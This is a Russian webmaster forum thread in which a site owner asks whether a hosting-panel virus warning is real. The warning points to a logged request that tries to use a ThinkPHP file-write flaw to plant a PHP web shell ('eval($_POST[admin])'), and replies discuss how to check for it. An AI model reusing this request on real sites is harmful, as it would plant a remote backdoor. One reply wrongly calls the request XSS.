- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
В панели хостинга вижу предупреждение о вирусе на сайте.
Выглядит оно так:
site.ru/public_html/wp-content/bps-backup/logs/http_error_log.txt
http://site.ru//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell @!!!><?php eval($_POST[admin]);?>REQUEST_URI: //?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content
Действительно ли это вирус, который необходимо лечить?
Это XSS в логи записалось, вам надо проверить реальная ли это дырка или только попытка поиска уязвимостей.
Я не знаю, к сожалению, как проверить, дырка ли это.
Но этот файл http_error_log.txt лежит у меня в папке logs, созданной плагином защиты Wordpress BulletProof Security: site.ru/public_html/wp-content/bps-backup/logs/http_error_log.txt
Я не знаю, к сожалению, как проверить, дырка ли это.
Воспроизведите запрос, он сам по себе безопасный. Посмотрите, существует ли файл robots1.php. Как-то так, в общих чертах.
вроде как shell под тему WP или плагин
поди тема для WP ломанная ??
Напишите ак разобрались с проблемой. Такое наблюдал в одном из рабочих компов.
Напишите ак разобрались с проблемой. Такое наблюдал в одном из рабочих компов.
Еще до создания темы нажал кнопку "Лечить", которая была под тем сообщением в контрольной панели хостинга.
Тогда файл http_error_log.txt очистился.
Если появится еще подобное сообщение о вирусе, буду, как советовали выше, воспроизводить запрос. Файла robots1.php не существует. Ломаная ли тема, не знаю, брал ее с нормального сайта в 2010-м.
Подскажите, пжста, что эта за хрень в конце?
<!--//GoogleAnalytics-->
</body>
</html><!--2c14a49abdbf31a58bd**********d6f-->
Подскажите, пжста, что эта за хрень в конце?
<!--//GoogleAnalytics-->
</body>
</html><!--2c14a49abdbf31a58bd**********d6f-->
Это md5-хеш.
Это md5-хеш.
Спасибо! А он там нужен?
Наверное, кто-то для чего-то это туда вставил. Вам виднее.